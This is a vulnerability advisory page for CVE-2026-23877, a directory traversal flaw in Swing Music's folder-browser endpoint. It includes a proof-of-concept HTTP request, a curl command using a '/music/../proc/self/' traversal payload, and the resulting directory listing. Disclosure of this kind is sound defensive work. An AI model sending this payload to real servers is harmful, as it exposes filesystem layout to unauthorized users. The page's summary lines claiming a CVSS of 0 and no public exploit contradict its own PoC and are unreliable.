What is the severity of CVE-2026-23877?

CVE-2026-23877 has a CVSS v3 score of 0, which is classified as Low severity.

Is there an exploit available for CVE-2026-23877?

No known public exploits are currently available for CVE-2026-23877.

Is there a patch available for CVE-2026-23877?

Yes, patches are available for CVE-2026-23877. Check the vendor advisories for update instructions.

CVE-2026-23877 - CVE Details, Severity, and Analysis

Published: January 26, 2026

Last updated:20 hours ago (January 26, 2026)

Updated January 26, 2026

no major risk factors

Summary

Swing Music's list_folders() function in the /folder/dir-browser endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem.

Details

The @api.post("/dir-browser") endpoint lacks proper path validation and authorization checks:

No authorization requirement: Any authenticated user can access the endpoint
Improper path handling: The code attempts to prepend "/" to non-existent paths but this doesn't prevent traversal:

req_dir = pathlib.Path("../../../../etc")  # → PosixPath('../../../../etc')
if not req_dir.exists():                    # → False
    req_dir = "/" / req_dir                 # → PosixPath('/../../../../etc')

PoC

Create a non-admin user
Authenticate as a non-admin user
Send the following request:

POST /folder/dir-browser HTTP/1.1
Host: IP:1970
Content-Type: application/json
Cookie: access_token_cookie=non-admin-access-token
Connection: keep-alive

{"folder":"/music/../proc/self/", "tracks_only":false}

curl --path-as-is -i -s -k -X $'POST' -H $'Content-Type: application/json' -b $'access_token_cookie=non-admin-access-token' \
    --data-binary $'{\"folder\":\"/music/../proc/self/\", \"tracks_only\":false}' \
    $'http://IP:1970/folder/dir-browser'

The response will list directories from /proc/self instead of restricting to user-accessible paths:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 466
Vary: Accept-Encoding
Connection: Keep-Alive

{"folders":[{"name":"attr","path":"/music/../proc/self/attr"},{"name":"cwd","path":"/music/../proc/self/cwd"},{"name":"fd","path":"/music/../proc/self/fd"},{"name":"fdinfo","path":"/music/../proc/self/fdinfo"},{"name":"map_files","path":"/music/../proc/self/map_files"},{"name":"net","path":"/music/../proc/self/net"},{"name":"ns","path":"/music/../proc/self/ns"},{"name":"root","path":"/music/../proc/self/root"},{"name":"task","path":"/music/../proc/self/task"}]}

Impact

Information Disclosure:

Server filesystem structure and layout
Configuration file locations and names
User account names from directory listings
Software versions and installed packages
Log file locations and system paths

Additional Risks:

Preparation for further attacks (LFI, RCE)
Bypass of access control mechanisms
Exposure of sensitive directory structures

Strobes VI. (2026). CVE-2026-23877 - CVE Details and Analysis. Strobes VI. Retrieved January 27, 2026, from https://vi.strobes.co/cve/CVE-2026-23877